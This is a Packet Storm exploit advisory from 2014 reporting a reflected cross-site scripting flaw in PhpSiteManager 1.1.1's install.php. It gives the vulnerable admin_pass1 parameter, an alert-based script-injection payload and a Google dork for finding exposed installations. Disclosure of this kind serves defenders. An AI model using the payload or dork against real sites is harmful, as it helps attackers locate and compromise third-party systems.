PhpSiteManager 1.1.1 Cross Site Scripting

2014-03-20T00:00:00
ID PACKETSTORM:125791
Type packetstorm
Reporter Hossein Hezami
Modified 2014-03-20T00:00:00

Description

                                        
                                            `#######################################################################  
#  
# Exploit Title: PhpSiteManager 1.1.1 Cross site scripting  
# Date: 2014 18 March  
# Author: Dr.3v1l  
# Vendor Homepage: http://sourceforge.net/projects/bakari  
# Download : http://filewatcher.com/m/phpSM_v1.1.2.tgz.338496-0.html  
# Version : 1.1.1  
# Tested on: Windows  
# Category: webapps  
# Google Dork: intext:"Powered by phpSM"  
#  
#######################################################################  
#  
# [+] Exploit :  
#  
# http://<server>/phpSM_v1.1.2/install.php  
#  
# URL encoded POST input admin_pass1 was set to :  
# "><script>alert(/xss/)</script>  
# The input is reflected inside a tag parameter between double quotes.  
#  
#######################################################################  
#  
# [+] Contact Me :  
#  
# B.Devils.B@gmail.com  
# Twitter.com/Doctor_3v1l  
# Facebook.com/bdb.0web  
# Facebook.com/groups/1427166220843499/  
# IR.linkedin.com/in/hossein3v1l  
# Hossein Hezami - Black_Devils B0ys  
#  
#######################################################################  
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam  
#######################################################################  
`